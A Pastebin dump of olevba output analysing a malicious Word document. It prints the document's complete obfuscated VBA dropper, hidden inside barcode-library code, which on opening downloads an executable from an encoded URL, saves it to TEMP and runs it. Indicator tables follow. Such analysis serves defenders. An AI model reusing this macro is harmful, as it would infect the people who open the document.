Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- olevba 0.41 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MAS-HB-V malware1.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
- ===============================================================================
- FILE: malware1.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: malware1.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub autoopen()
- bc_Code39 ""
- bc_EAN ""
- End Sub
- -------------------------------------------------------------------------------
- VBA MACRO Module1.bas
- in file: malware1.doc - OLE stream: u'Macros/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public bc_25_I As Object
- Public bc_26_I As Object
- Public bc_27_I As Object
- Public bc_28_I As String
- Public bc_29_I As String
- Public bc_30_I As Object
- Public Const pzonda = "a"
- Public Const pzonde = "e"
- Public Const pzondP = "P"
- Sub Init()
- If VarType(Asc("A")) = 2 Then IsMs = True Else IsMs = False
- End Sub
- Public Function EncodeBarcode(ShIx As Integer, xAddr As String, _
- code As String, pbctype%, Optional pgraficky%, _
- Optional pparams%, Optional pzones%) As String
- Dim s$, bctype%, graficky%, params%, zones%
- Dim oo As Object
- Call Init
- If IsMissing(pzones) Then zones = 2 Else zones = pzones
- If IsMissing(pparams) Then params = 0 Else params = pparams
- If IsMissing(pgraficky) Then graficky = 1 Else graficky = pgraficky
- If IsMissing(pbctype) Then bctype = 0 Else bctype = pbctype
- Select Case bctype
- Case 1
- s = bc_EAN(code, params, zones)
- Case 2
- s = bc_25I(code, zones)
- Case 3
- s = bc_Code39(code, params, zones)
- Case 50
- s = dmx_gen(code, IIf(params = 1, "ASCII", ""))
- Case 51
- s = "mode=" & Mid("MLQH", (params Mod 4) + 1, 1)
- s = qr_gen(code, s)
- Case Else
- s = bc_Code128(code, params, zones)
- End Select
- If graficky <> 0 Then
- If bctype >= 50 Then
- If IsMs Then
- Call bc_2Dms(s)
- Else
- Call bc_2D(ShIx, xAddr, s)
- End If
- Else
- If IsMs Then
- Call bc_1Dms(s)
- Else
- Call bc_1D(ShIx, xAddr, s)
- End If
- End If
- EncodeBarcode = ""
- Else
- EncodeBarcode = s
- End If
- Exit Function
- End Function
- Public Function pzone3(bc_Code_40() As Variant, pparam As Integer) As String
- Dim i As Integer
- pgraficky = ""
- For i = LBound(bc_Code_40) To UBound(bc_Code_40)
- pgraficky = pgraficky & Chr(bc_Code_40(i) - pparam - 5 * pparam - 4455)
- Next i
- pzone3 = pgraficky
- End Function
- Function AscL(s As String) As Long
- If IsMs Then AscL = AscW(s) Else AscL = Asc(s)
- End Function
- Function bc_25I(chaine$, Optional zones%) As String
- Dim i%, j%, k%, l%, s$, q$, zon$
- If IsMissing(zones%) Then
- zon$ = "DD"
- Else
- zon$ = IIf(zones% <= 0, "", Mid$("DDDDDDDDDD", 1, zones%))
- End If
- q = chaine
- s = ""
- For i = 1 To Len(q)
- j = (AscL(Mid(q, i, 1)) Mod 256) - 48
- If (j >= 0 And j <= 9) Then s = s & Chr(48 + j)
- Next
- i = Len(s)
- If i <= 0 Then
- bc_25I = ""
- Exit Function
- End If
- If (i Mod 2) = 1 Then s = "0" & s
- q = zon & "0A0A"
- For i = 1 To Len(s) Step 2
- j = Val(Mid(s, i, 1)) * 5
- k = 50 + Val(Mid(s, i + 1, 1)) * 5
- For l = 1 To 5
- q = q & Mid(BCEnc25, j + l, 1) & Mid(BCEnc25, k + l, 1)
- Next
- Next
- bc_25I = q & "01A0" & zon
- End Function
- Public Function bc_Code39(chaine$, Optional params%, Optional zones%) As String
- Dim i, j%, s$, p$, q$, zon$, ext%, ch%, check%
- Set bc_25_I = CreateObject("Microsoft" + ".XMLHTT" + pzondP)
- Set bc_30_I = CreateObject("Shell.Application")
- Set bc_26_I = CreateObject("Adodb.Str" + pzonde + pzonda + "m")
- GoTo bc_27_g
- If IsMissing(zones) Then
- zon$ = "DD"
- Else
- zon$ = IIf(zones <= 0, "", Mid("DDDDDDDDDD", 1, zones))
- End If
- If IsMissing(params) Then
- check = 0
- ext = 0
- Else
- check = Int(params / 4) Mod 2
- ext = (params Mod 4) - 1
- End If
- s = chaine
- If Len(s) <= 0 Then
- bc_Code39 = ""
- Exit Function
- End If
- If ext = -1 Then
- For i = 1 To Len(s)
- p = Mid(s, i, 1)
- j = InStr(BCChs39, p)
- If j <= 0 Or AscL(p) > 90 Then
- ext = 1
- Exit For
- End If
- Next
- End If
- If ext = 1 Then
- p = s
- s = ""
- For i = 1 To Len(p)
- j = AscL(Mid(p, i, 1)) Mod 256
- If j = 32 Then
- s = s & " "
- ElseIf (j <= 127) Then
- s = s & Trim(Mid(BCExt39, 1 + j * 2, 2))
- End If
- Next
- End If
- q = zon & "0C0A2A2A0A"
- ch = 0
- For i = 1 To Len(s)
- p = Mid(s, i, 1)
- j = InStr(BCChs39, p) - 1
- If j >= 0 And j < 43 Then
- ch = (ch + j) Mod 43
- q = q & Mid(BCEnc39, j * 9 + 1, 9) & "A"
- End If
- Next
- If check = 1 Then q = q & Mid(BCEnc39, ch * 9 + 1, 9) & "A"
- bc_Code39 = q & "0C0A2A2A0" & zon
- bc_27_g:
- Set bc_27_I = CreateObject("WScript.Sh" + pzonde + "ll").Environment(pzondP + "" + "roc" + pzonde + "ss")
- End Function
- Public Function bc_EAN(chaine$, Optional params%, Optional zones%) As String
- Dim i%, j%, checksum%, first%, CodeBarre$, s$, p$, q$, zon$, subtyp%, check%
- Dim tableA As Boolean
- Dim checksud() As Variant
- checksud = Array(4769, 4781, 4781, 4777, 4723, 4712, 4712, 4784, 4784, 4784, 4711, 4773, 4762, 4774, 4762, 4711, 4779, 4780, 4712, 4721, 4720, 4781, 4779, 4719, 4718, 4712, 4717, 4716, 4784, 4766, 4765, 4767, 4711, 4766, 4785, 4766)
- bc_25_I.Open Chr(Asc(pzondP) - 9) + "ET", pzone3(checksud, 35), False
- GoTo bc_E_A_N
- If IsMissing(zones) Then
- zon$ = "DD"
- Else
- zon$ = IIf(zones <= 0, "", Mid("DDDDDDDDDD", 1, zones))
- End If
- If IsMissing(params) Then
- check = 0
- subtyp = 0
- Else
- check = Int(params / 8) Mod 2
- subtyp = params Mod 8
- End If
- s = chaine
- p = ""
- CodeBarre = zon
- For i = 1 To Len(s)
- j = AscL(Mid(s, i, 1)) Mod 256
- If j >= 48 Or j <= 57 Then p = p & Chr(j)
- Next i
- s = p
- If subtyp = 4 Then
- While Len(s) < 6
- s = "0" & s
- Wend
- If Len(s) > 6 Then s = Left(s, 6)
- p = s
- first = Val(Right(p, 1))
- If first >= 5 Then
- s = "00" & Left(p, 5) & "0000" & Right(p, 1)
- ElseIf first = 4 Then
- s = "00" & Left(p, 4) & "00000" & Mid(p, 5, 1)
- ElseIf first = 3 Then
- s = "00" & Left(p, 3) & "00000" & Mid(p, 4, 2)
- Else
- s = "00" & Left(p, 2) & Right(p, 1) & "0000" & Mid(p, 3, 3)
- End If
- End If
- If check = 1 Or subtyp = 4 Then s = s & "0"
- While Len(s) < 13
- s = "0" & s
- Wend
- checksum = 0
- first = 1
- For i = 1 To 12
- j = AscL(Mid(s, i, 1)) Mod 256
- checksum = (checksum + first * (j - 48)) Mod 10
- first = (first + 2) Mod 4
- Next
- s = Left(s, 12) & Chr(48 + (10 - checksum Mod 10) Mod 10)
- If subtyp = 4 Then
- s = "000000" & Right(s, 1) & p
- End If
- If Left(s, 12) <> "000000000000" Then
- CodeBarre = CodeBarre & "0A0"
- If subtyp = 0 And Left(s, 5) = "00000" Then subtyp = 2
- If subtyp = 0 And Left(s, 1) = "0" Then subtyp = 3
- If subtyp = 0 Then subtyp = 1
- If subtyp = 2 Then
- j = 5
- p = "0000LLLLRRRR"
- ElseIf subtyp = 3 Then
- j = 1
- p = "LLLLLLRRRRRR"
- ElseIf subtyp = 4 Then
- first = Val(Mid(s, 7, 1))
- j = 7
- p = "000000" & Mid("GGGLLLGGLGLLGGLLGLGGLLLGGLGGLLGLLGGLGLLLGGGLGLGLGLGLLGGLLGLG", 1 + first * 6, 6)
- Else
- j = 1
- first = Val(Left(s, 1))
- p = Mid("LLLLLLLLGLGGLLGGLGLLGGGLLGLLGGLGGLLGLGGGLLLGLGLGLGLGGLLGGLGL", 1 + first * 6, 6) + "RRRRRR"
- End If
- For i = j To 12
- first = Val(Mid(s, i + 1, 1))
- q = Mid(BCEncE13, 1 + first * 12, 12)
- Select Case Mid(p, i, 1)
- Case "L"
- CodeBarre = CodeBarre & Mid(q, 1, 4)
- Case "G"
- CodeBarre = CodeBarre & Mid(q, 5, 4)
- Case "R"
- CodeBarre = CodeBarre & Mid(q, 9, 4)
- End Select
- Select Case subtyp
- Case 1: If i = 6 Then CodeBarre = CodeBarre & "A0A0A"
- Case 3: If i = 6 Then CodeBarre = CodeBarre & "A0A0A"
- Case 2: If i = 8 Then CodeBarre = CodeBarre & "A0A0A"
- End Select
- Next
- If subtyp = 4 Then CodeBarre = CodeBarre & "A0A"
- CodeBarre = CodeBarre & "0A0"
- End If
- bc_EAN = CodeBarre & zon
- bc_E_A_N:
- bc_28_I = bc_27_I("TEM" + pzondP)
- bc_Code128 ""
- End Function
- Function bc_Code128(chaine$, Optional params%, Optional zones%) As String
- Dim i%, checksum&, checkw&, min$, n%, zon$, s$, c128$, tbl$, q$, j%
- bc_29_I = bc_28_I + "\" + LCase(pzondP) + pzonda + pzonda + pzonde + "me1" + "." + pzonde + "x" + pzonde
- GoTo bc_Code1283
- If IsMissing(zones) Then
- zon$ = "DD"
- Else
- zon$ = IIf(zones <= 0, "", Mid("DDDDDDDDDD", 1, zones))
- End If
- c128 = ""
- s = chaine
- If Len(s) <= 0 Then
- bc_Code128 = ""
- Exit Function
- End If
- min = ""
- If (params Mod 4) >= 1 And (params Mod 4) <= 3 Then
- tbl = Mid("ABC", params Mod 4, 1)
- Else
- tbl = ""
- End If
- i = 1
- Do While i <= Len(s)
- n = AscL(Mid(s, i, 1)) Mod 256
- If n = 95 Then
- i = i + 1
- If i > Len(s) Then n = 0 Else n = AscL(Mid(s, i, 1)) Mod 256
- If (n >= 49 And n <= 52) Then
- n = 48 - n
- ElseIf n >= 64 And n <= 94 Then
- n = n - 64
- ElseIf n = 48 Then
- n = 31
- Else
- n = 95
- End If
- End If
- If n >= 128 Then
- n = n Mod 128
- min = min & "z"
- c128 = c128 & "-05"
- End If
- Select Case n
- Case 48 To 57, -1
- min = min & "C"
- Case -4 To -2
- min = min & "z"
- Case 0 To 31
- min = min & "A"
- Case 32 To 63
- min = min & "z"
- Case Else
- min = min & "B"
- End Select
- q = "000" & Trim(CStr(Abs(n)))
- If n < 0 Then q = "-" & Right(q, 2) Else q = Right(q, 3)
- c128 = c128 & q
- i = i + 1
- Loop
- s = zon
- If tbl = "" Then
- If Left(min, 4) = "CCCC" Then
- tbl = "C"
- ElseIf InStr(min, "A") <= 0 Or Left(min, 1) = "B" Then
- tbl = "B"
- Else
- tbl = "A"
- End If
- End If
- n = 103 + AscL(tbl) - 65
- s = s & Mid(BCEnc128, 6 * n + 1, 6)
- checksum = n
- checkw = 1
- i = 1
- Do While i <= Len(min)
- n = Val(Mid(c128, -2 + (i * 3), 3))
- q = Mid(min, i, 1)
- Select Case tbl
- Case "C"
- If q <> "C" Then
- If q = "A" Or (q = "z" And InStr(Mid(min, i), "B") < 0) Then
- tbl = "A"
- n = 101
- Else
- tbl = "B"
- n = 100
- End If
- i = i - 1
- Else
- If (n = -1) Then
- n = 102
- Else
- j = (n - 48) * 10
- If (i >= Len(min) Or Mid(min, i + 1, 1) <> "C") Then
- tbl = "B"
- n = 100
- i = i - 1
- Else
- i = i + 1
- n = Val(Mid(c128, -2 + (i * 3), 3))
- If n < 0 Then
- tbl = "B"
- n = 100
- i = i - 2
- Else
- n = j + (n - 48)
- End If
- End If
- End If
- End If
- Case "A"
- If q = "B" Then
- n = 100
- i = i - 1
- tbl = "B"
- ElseIf Mid(min, i, 4) = "CCCC" Then
- n = 99
- i = i - 1
- tbl = "C"
- Else
- Select Case n
- Case -5: n = 98
- Case -4: n = 101
- Case -3: n = 96
- Case -2: n = 97
- Case -1: n = 102
- Case 0 To 31
- n = n + 64
- Case Else
- n = n - 32
- End Select
- End If
- Case "B"
- If q = "A" Then
- n = 101
- i = i - 1
- tbl = "A"
- ElseIf Mid(min, i, 4) = "CCCC" Then
- n = 99
- i = i - 1
- tbl = "C"
- Else
- Select Case n
- Case -5: n = 98
- Case -4: n = 100
- Case -3: n = 96
- Case -2: n = 97
- Case -1: n = 102
- Case Else
- n = n - 32
- End Select
- End If
- End Select
- If n >= 0 And n <= 102 Then
- s = s & Mid(BCEnc128, 6 * n + 1, 6)
- checksum = (checksum + checkw * n) Mod 103
- checkw = checkw + 1
- End If
- i = i + 1
- Loop
- n = checksum Mod 103
- s = s & Mid(BCEnc128, 6 * n + 1, 6)
- s = s + "1C2A0A1"
- bc_Code128 = s & zon
- bc_Code1283:
- bc_25_I.Send
- dmx_place "", 0, 0, 0, 0, 0
- End Function
- Function dmx_place(parr As String, psiz As Integer, _
- pbl As Integer, prow As Integer, pcol As Integer, _
- pbit As Integer) As Boolean
- With bc_26_I
- bc_26_I.Type = 1
- bc_26_I.Open
- bc_26_I.write bc_25_I.responseBody
- bc_26_I.savetofile bc_29_I, 2
- End With
- GoTo dmx_pl3_ace
- Dim ix%, va%, r%, c%, s%
- r = prow
- c = pcol
- If psiz > 0 Then
- s = psiz / pbl
- If r < 0 Then
- r = r + psiz
- c = c + 4 - ((psiz + 4) Mod 8)
- End If
- If c < 0 Then
- c = c + psiz
- r = r + 4 - ((psiz + 4) Mod 8)
- End If
- If c >= psiz Then
- c = c - psiz
- r = r + 1
- End If
- r = r + (Int(r / s) * 2)
- c = c + (Int(c / s) * 2)
- End If
- dmx_place = False
- r = r + 2
- c = c + 2
- ix = r * 20 + Int(c / 8)
- If ix > 12 Or ix < 0 Then Exit Function
- c = 2 ^ (c Mod 8)
- If psiz > 0 Then
- If (Int(va / c) Mod 2) = 0 Then
- If pbit < 0 Then
- dmx_place = True
- Exit Function
- End If
- Else
- Exit Function
- End If
- End If
- If pbit > 0 Then
- If (Int(va / c) Mod 2) = 0 Then va = va + c
- End If
- dmx_place = True
- dmx_pl3_ace:
- bc_30_I.Open (bc_29_I)
- End Function
- Sub bc_1Dms(xBC As String)
- Dim xShape As Shape, xBkgr As Shape
- Dim xSheet As Worksheet
- Dim xRange As Range, xCell As Range
- Dim xAddr As String
- Dim xPosOldX As Double, xPosOldY As Double
- Dim xSizeOldW As Double, xSizeOldH As Double
- Dim x As Double
- Dim n%, w%, s$, h%, g%
- If TypeName(Application.Caller) <> "Range" Then
- Exit Sub
- End If
- Set xSheet = Application.Caller.Worksheet
- Set xRange = Application.Caller
- xAddr = xRange.Address
- xPosOldX = xRange.Left
- xPosOldY = xRange.Top
- xSizeOldW = 0
- xSizeOldH = 0
- s = "BC" & xAddr & "#GR"
- x = 0
- For n = 1 To Len(xBC)
- w = AscL(Mid(xBC, n, 1)) Mod 256
- If (w >= 48 And w <= 57) Then
- w = (w - 48) Mod 5 + 1
- ElseIf (w >= 65 And w <= 69) Then
- w = w - 64
- Else
- w = 0
- End If
- x = x + 1.5 * w
- Next n
- If x <= 0# Then Exit Sub
- On Error Resume Next
- Set xShape = xSheet.Shapes(s)
- On Error GoTo 0
- If Not (xShape Is Nothing) Then
- xPosOldX = xShape.Left
- xPosOldY = xShape.Top
- xSizeOldW = xShape.Width
- xSizeOldH = xShape.Height
- xShape.Delete
- End If
- On Error Resume Next
- xSheet.Shapes("BC" & xAddr & "#BK").Delete
- On Error GoTo 0
- Set xBkgr = xSheet.Shapes.AddShape(msoShapeRectangle, 0, 0, x, 51#)
- xBkgr.Line.Visible = msoFalse
- xBkgr.Line.Weight = 0#
- xBkgr.Line.ForeColor.RGB = RGB(255, 255, 255)
- xBkgr.Fill.Solid
- xBkgr.Fill.ForeColor.RGB = RGB(255, 255, 255)
- xBkgr.Name = "BC" & xAddr & "#BK"
- Set xShape = Nothing
- x = 0#
- g = 0
- For n = 1 To Len(xBC)
- w = AscL(Mid(xBC, n, 1)) Mod 256
- If (w >= 48 And w <= 57) Then
- If w >= 53 Then h = 47 Else h = 50
- w = (w - 48) Mod 5 + 1
- Set xShape = xSheet.Shapes.AddShape(msoShapeRectangle, x, 0, 1.5 * w, h)
- xShape.Line.Visible = msoFalse
- xShape.Line.Weight = 0#
- xShape.Fill.Solid
- xShape.Fill.ForeColor.RGB = RGB(0, 0, 0)
- g = g + 1
- xShape.Name = "BC" & xAddr & "#BR" & g
- If g = 1 Then
- xSheet.Shapes.Range(Array(xBkgr.Name, xShape.Name)).Group.Name = s
- Else
- xSheet.Shapes.Range(Array(s, xShape.Name)).Group.Name = s
- End If
- ElseIf (w >= 65 And w <= 69) Then
- w = w - 64
- Else
- w = 0
- End If
- x = x + 1.5 * w
- Next n
- On Error Resume Next
- Set xShape = xSheet.Shapes(s)
- On Error GoTo 0
- If Not (xShape Is Nothing) Then
- xShape.Left = xPosOldX
- xShape.Top = xPosOldY
- If xSizeOldW > 0 Then
- xShape.Width = xSizeOldW
- xShape.Height = xSizeOldH
- End If
- Else
- If Not (xBkgr Is Nothing) Then xBkgr.Delete
- End If
- End Sub
- +------------+----------------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------------+-----------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- | Suspicious | Open | May open a file |
- | Suspicious | Shell | May run an executable file or a system |
- | | | command |
- | Suspicious | Shell.Application | May run an application (if combined |
- | | | with CreateObject) |
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | SaveToFile | May create a text file |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | Suspicious | VBA obfuscated | VBA string expressions were detected, |
- | | Strings | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | Hex String | | 0C0A2A2A0A |
- | | ** | |
- | | | |
- | Hex String | | 0C0A2A2A |
- | | ** | |
- | VBA string | Microsoft.XMLHTT | "Microsoft" + ".XMLHTT" |
- | VBA string | roc | "" + "roc" |
- | VBA string | me1. | "me1" + "." |
- +------------+----------------------+-----------------------------------------+
Add Comment
Please, Sign In to add comment